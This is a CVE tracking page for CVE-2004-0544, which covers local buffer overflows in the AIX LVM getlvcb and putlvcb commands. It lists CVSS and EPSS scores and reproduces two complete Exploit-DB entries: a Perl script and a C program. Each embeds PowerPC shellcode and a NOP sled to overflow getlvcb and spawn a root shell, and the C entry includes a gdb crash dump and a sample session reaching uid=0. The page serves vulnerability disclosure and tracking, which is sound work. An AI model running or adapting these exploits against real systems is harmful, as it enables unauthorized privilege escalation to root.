CVE-2004-0544

EPSS

0.7%V4

Vector

Local

Published

2004-06-10
02h00 +00:00

Modified

2017-07-10
12h57 +00:00

Official links

CVE.org

NVD

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Notifications manage

List of Notifications

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Criteria applied when sending the alert: compared with the last alert sent + differences in CISA, EPSS, CVSS, CWE, Solutions, CPE.

Parameters

You can specify a title that will be retrieved in the alerts that will be sent out.

Specified here a CVE ID as CVE-2025-1234

Planning

Month

Next run calculation

Day

Weekday

Hour

Minute

Creation date

Last execution

Next execution

Functionality requiring a connection

This feature, which allows you to receive alerts, is only active when you are logged into your account.

CVE Descriptions

Multiple buffer overflows in LVM for AIX 5.1 and 5.2 allow local users to gain privileges via the (1) putlvcb or (2) getlvcb commands.

CVE Informations

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	7.2		AV:L/AC:L/Au:N/C:C/I:C/A:C	nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	3.22%	–	–
2022-02-13	–	–	3.22%	–	–
2022-04-03	–	–	3.22%	–	–
2022-09-18	–	–	3.22%	–	–
2023-03-12	–	–	–	0.04%	–
2024-02-11	–	–	–	0.04%	–
2024-02-25	–	–	–	0.04%	–
2024-04-14	–	–	–	0.04%	–
2024-06-02	–	–	–	0.04%	–
2024-06-09	–	–	–	0.04%	–
2024-10-27	–	–	–	0.04%	–
2024-12-15	–	–	–	0.04%	–
2024-12-22	–	–	–	0.04%	–
2025-01-19	–	–	–	0.04%	–
2025-01-19	–	–	–	0.04%	–
2025-03-18	–	–	–	–	1.02%
2025-03-30	–	–	–	–	0.7%
2025-04-15	–	–	–	–	0.7%
2025-04-15	–	–	–	–	0.7,%

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Date	Percentile
2022-02-06	65%
2022-02-13	66%
2022-04-03	83%
2022-09-18	84%
2023-03-12	8%
2024-02-11	7%
2024-02-25	8%
2024-04-14	9%
2024-06-02	9%
2024-06-09	1%
2024-10-27	11%
2024-12-15	12%
2024-12-22	11%
2025-01-19	12%
2025-01-19	12%
2025-03-18	76%
2025-03-30	7%
2025-04-15	71%
2025-04-15	71%

Exploit information

Exploit Database EDB-ID : 23840

Publication date : 2003-05-29 22h00 +00:00
Author : watercloud
EDB Verified : Yes

source: https://www.securityfocus.com/bid/9905/info getlvcb has been reported to be prone to a buffer overflow vulnerability. When an argument is passed to the getlvcb utility, the string is copied into a reserved buffer in memory. Data that exceeds the size of the reserved buffer will overflow its bounds and will trample any saved data that is adjacent to the affected buffer. Ultimately this may lead to the execution of arbitrary instructions in the context of the root user. An attacker will require system group privileges prior to the execution of the getlvcb utility, the attacker may exploit the issue described in BID 9903 in order to gain the necessary privileges required to exploit this vulnerability. #!/usr/bin/perl # FileName: x_getlvcb_aix433_limited.pl # Exploit getlvcb of Aix4.3.3 to get a uid=0 shell from a gid=0. # Tested : on Aix4.3.3. # Author : watercloud@xfocus.org # Site : www.xfocus.org www.xfocus.net # Date : 2003-5-30 # Announce: use as your owner risk! $CMD="/usr/sbin/getlvcb"; $_=`/usr/bin/oslevel`; $XID="\x03"; $UID="\x97"; print "\n\nExploit $CMD for Aix 4.3.3 to get uid=0 shell.\n"; print "From: [ www.xfocus.org 2003-5-30 ].\n\n"; print "Note :\n"; print "You must get gid=0 befor use this exploit,for example "; print "my another program x_make_433_limited.pl :)\n"; print "If you get a shell euid=0 then run this command: "; print "/usr/bin/syscall setreuid 0 0 \\; execve '/bin/sh'\n"; $NOP="\x7c\xa5\x2a\x79"x800; %ENV=(); $ENV{CCC}="AA".$NOP.&getshell($XID,$UID); $ret=system $CMD ,"AAA"."\x2f\xf2\x2b\x40"x300; for($i=0;$i<4 && $ret;$i++){ for($j=0;$j<4 && $ret;$j++) { $ENV{CCC}="A"x $i .$NOP.&getshell($XID,$UID); system $CMD ,"A"x $j ."\x2f\xf2\x2b\x40"x300; } } #sub sub getshell($XID,$GID) { my $SHELL,($XID,$GID)=@_; $SHELL="\x7e\x94\xa2\x79\x7e\x84\xa3\x78\x40\x82\xff\xfd"; $SHELL.="\x7e\xa8\x02\xa6\x3a\xb5\x01\x40\x88\x55\xfe\xe0"; $SHELL.="\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6"; $SHELL.="\x4c\xc6\x33\x42\x44\xff\xff\x02$GID$XID\xff\xff"; $SHELL.="\x38\x75\xff\x04\x38\x95\xff\x0c\x7e\x85\xa3\x78"; $SHELL.="\x90\x75\xff\x0c\x92\x95\xff\x10\x88\x55\xfe\xe1"; $SHELL.="\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh\xff"; return $SHELL; } #EOF

Exploit Database EDB-ID : 23841

Publication date : 2004-03-16 23h00 +00:00
Author : mattox
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/9905/info getlvcb has been reported to be prone to a buffer overflow vulnerability. When an argument is passed to the getlvcb utility, the string is copied into a reserved buffer in memory. Data that exceeds the size of the reserved buffer will overflow its bounds and will trample any saved data that is adjacent to the affected buffer. Ultimately this may lead to the execution of arbitrary instructions in the context of the root user. An attacker will require system group privileges prior to the execution of the getlvcb utility, the attacker may exploit the issue described in BID 9903 in order to gain the necessary privileges required to exploit this vulnerability. /******************************************************************** * Secure Network Operations (http://www.secnetops.com) * Local AIX getlvcb Exploit * by: mattox@secnetops.com * Program Description: * * Vulnerability Details: * * # gdb -q /usr/sbin/getlvcb * (no debugging symbols found)...(gdb) set args `perl -e 'print "A" x 183'`ABCD * (gdb) r * Starting program: /usr/sbin/getlvcb `perl -e 'print "A" x 183'`ABCD * * Program received signal SIGSEGV, Segmentation fault. * 0x41424344 in ?? () * (gdb) bt * #0 0x41424344 in ?? () * (gdb) i r * r0 0x6000328e 1610625678 * r1 0x2ff228a0 804399264 * r2 0xf012de88 -267198840 * r3 0x1 1 * r4 0x9 9 * r5 0x2ff22ff8 804401144 * r6 0xd030 53296 * r7 0x0 0 * r8 0x60000000 1610612736 * r9 0x600039ce 1610627534 * r10 0x0 0 * r11 0x6000214a 1610621258 * r12 0x41424344 1094861636 * r13 0x200008b0 536873136 * r14 0x0 0 * r15 0x0 0 * r16 0x0 0 * r17 0x0 0 * r18 0x0 0 * r19 0x0 0 * r20 0x0 0 * r21 0x0 0 * r22 0x0 0 * r23 0x0 0 * r24 0x0 0 * r25 0x0 0 * r26 0x0 0 * r27 0x0 0 * r28 0x41414141 1094795585 * r29 0x41414141 1094795585 * r30 0x41414141 1094795585 * r31 0x41414141 1094795585 * pc 0x41424344 1094861636 * ps 0x4000d030 1073795120 * cr 0x26222444 639771716 * lr 0x41424344 1094861636 * ctr 0x0 0 * xer 0x0 0 * fpscr 0x0 0 * vscr 0x0 0 * vrsave 0x0 0 * * ............................................................. * $ uname -a * AIX thunderfoot 1 5 002064864C00 * * $ whoami * kinet1k * * $ id * uid=7(kinet1k) gid=1(staff) groups=0(system) * $ ./r00tme 208 231 * * Secure Network Operations (written by: mattox@secnetops.com) * AIX Local getlvncb exploit * * Fixin to overwrite the address: 0x2ff2283d * Using a buffer size of: 208 * And an offset of: 231 * * # whoami * root * * # id * uid=0(root) gid=1(staff) groups=0(system) *.............................................................. * *********************************************************************/ #include <stdlib.h> #include <string.h> #define OFFSET 0 #define BUFFERSIZE 208 #define NOP "\x7c\xa5\x2a\x79" #define RETURNADDR 0x2ff22924 char shellcode[ ] = "\x7e\x94\xa2\x79\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40" "\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6" "\x4c\xc6\x33\x42\x44\xff\xff\x02\xb6\x05\xff\xff\x7e\x94\xa2\x79" "\x7e\x84\xa3\x78\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40" "\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6" "\x4c\xc6\x33\x42\x44\xff\xff\x02\xb7\x05\xff\xff\x38\x75\xff\x04" "\x38\x95\xff\x0c\x7e\x85\xa3\x78\x90\x75\xff\x0c\x92\x95\xff\x10" "\x88\x55\xfe\xe1\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh"; int main( int argc, char *argv[ ] ) { int i; int offset = OFFSET, bufferSize = BUFFERSIZE; unsigned long esp, returnAddress, *addressPointer; char *buffer, *pointer; /* Usage */ if( argv[ 1 ] ) { if( strncmp( argv[ 1 ], "-h", 3 ) == 0 || strncmp( argv[ 1 ], "-H", 3 ) == 0 ) { printf( "\n\tUsage: %s <buffer size> <offset>\n\n", argv[ 0 ] ); exit( 0 ); } } if( argc > 1 ) { bufferSize = atoi( argv[ 1 ] ); } if( argc > 2 ) { offset = atoi( argv[ 2 ] ); } returnAddress = RETURNADDR - offset; printf( "\nSecure Network Operations (written by: mattox@secnetops.com)\n" ); printf( "AIX Local getlvncb exploit\n\n" ); printf( "Fixin to overwrite the address: 0x%x\n", returnAddress ); printf( "Using a buffer size of: %i\n", bufferSize ); printf( "And an offset of: %i\n", offset ); if( !( buffer = malloc( bufferSize ) ) ) { printf( "Coundn't allocate memory.\n" ); exit( 0 ); } /* I know, this is weird stuff...had to sub odd number to get ret addy to align */ pointer = buffer - 1; addressPointer = ( long * )pointer; for( i = 0; i < bufferSize; i+=4 ) { *( addressPointer++ ) = returnAddress; } for( i = 0; i < ( bufferSize / 2 ); i+=4 ) { buffer[ i ] = ( unsigned long )NOP; } pointer = buffer + ( ( bufferSize / 2 ) - ( strlen( shellcode )/2 ) ); for( i = 0; i < strlen( shellcode ); i++ ) { *( pointer++ ) = shellcode[ i ]; } buffer[ bufferSize - 1 ] = '\0'; execl( "/usr/sbin/getlvcb", "getlvcb", buffer, 0 ); free( buffer ); return 0; }